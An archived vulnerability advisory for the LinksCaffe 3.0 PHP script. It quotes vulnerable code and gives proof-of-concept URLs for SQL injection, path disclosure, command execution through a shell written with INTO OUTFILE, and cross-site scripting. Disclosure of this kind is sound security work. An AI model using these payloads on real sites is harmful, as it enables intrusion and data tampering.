Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: b06-3838.htm

LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties



LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties
LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties



LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties=0D
=0D
Produce       : LinksCaffe 3.0=0D
Website : http://gonafish.com/=0D 
Impact        : manupulation of data / system access=0D
Discovered by : Simo64 - Moroccan Security Team=0D
=0D
[+] SQL injection=0D
******************=0D
=0D
  [1]Vulnerable code in line 223 in links.php=0D
=0D
	code : =0D
=0D
	$rime = mysql_query("SELECT * from links WHERE link_val like 'yes' AND cat_id LIKE '$cat' ORDER BY hits DESC, link_pop DESC, rate DESC LIMIT $offset, $limit") or die(mysql_error());=0D
=0D
	$offset and $limit vars are not sanitized before to be used to conducte sql injection attacks=0D
=0D
	Exploit : =0D
=0D
http://localhost/linkscaffe/links.php?cat=1&offset=[SQL]=0D 
http://localhost/linkscaffe/links.php?cat=1&limit=[SQL]=0D 
  =0D
  [2]	Vulnerable code in line 516 in links.php=0D
  =0D
  code : =0D
=0D
	if (!$newdays)=0D
	{=0D
	$newdays=$daysnew;=0D
	}=0D
	else=0D
	{=0D
	$newdays=$newdays;=0D
	}=0D
	=0D
	$rime1 = mysql_query("SELECT COUNT(*) from links WHERE (to_days(NOW()) - to_days(links.date)) <= $newdays AND link_val = 'yes'") or die(mysql_error());=0D
			=0D
	Exploit :=0D
http://localhost/linkscaffe/links.php?action=new&newdays=[SQL]=0D 
	=0D
	=0D
  [3]	Vulnerable code in line 516 in links.php=0D
  =0D
  code :=0D
  =0D
  if ($action=="deadlink")=0D
	{=0D
	........=0D
	$rime = mysql_query("SELECT * from links WHERE link_id=$link_id") or die(mysql_error());=0D
	while($row = mysql_fetch_array($rime)) {=0D
	extract($row);=0D
	echo "
  • $link_name
    $link_desc
  • ";=0D echo "=0D
    ";=0D }=0D =0D $link_id var are not sanitized before to be used to conducte sql injection attacks=0D =0D Exploit :=0D =0D http://localhost/linkscaffe/links.php?action=deadlink&link_id=[SQL]=0D =0D [+] FullPath disclosure :=0D =0D PoC : =0D =0D http://localhost/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/*=0D =0D Result :=0D =0D Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 540=0D =0D Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 549=0D =0D Warning: Supplied argument is not a valid MySQL result resource in /usr/home/simo64/linkscaffe/links.php on line 554=0D =0D [+] Remote Command Execution=0D *****************************=0D =0D if magic_quote_gpc == OFF we can create a shell in writable folder using (3)!!=0D =0D Exploit :=0D =0D http://localhost/linkscaffe/links.php?action=deadlink&link_id=-1+UNION+SELECT+0,0,0,0,'',0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'/usr/home/simo64/linkscaffe/pipo.php'/*=0D =0D after we can exec cmds=0D =0D http://localhost/linkscaffe/pipo.php?cmd=ls;id=0D =0D =0D =0D [+] Cross Site Scripting =0D *************************=0D =0D $tablewidth var in counter.php is not sanitized before to be used to conducte xss attacks=0D $newdays var in links.php is not sanitized before to be used to conducte xss attacks=0D $tableborder,$menucolor,$textcolor,$bodycolor vars in links.php are not sanitized before to be used to conducte xss attacks=0D =0D PoC : =0D =0D http://localhost/linkscaffe/counter.php?tablewidth='%3E[XSS] =0D http://localhost/linkscaffe/links.php?action=new&newdays=[XSS]=0D =0D http://localhost/linkscaffe/menu.inc.php?tableborder='%3E[XSS]=0D =0D http://localhost/linkscaffe/menu.inc.php?menucolor='%3E[XSS]=0D =0D http://localhost/linkscaffe/menu.inc.php?textcolor='%3E[XSS]=0D =0D http://localhost/linkscaffe/menu.inc.php?bodycolor='%3E[XSS]=0D =0D =0D =0D Contact : simo64@gmail.com=0D =0D greetz to all friends !


    TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
    Site design & layout copyright © 1986-2014 AOH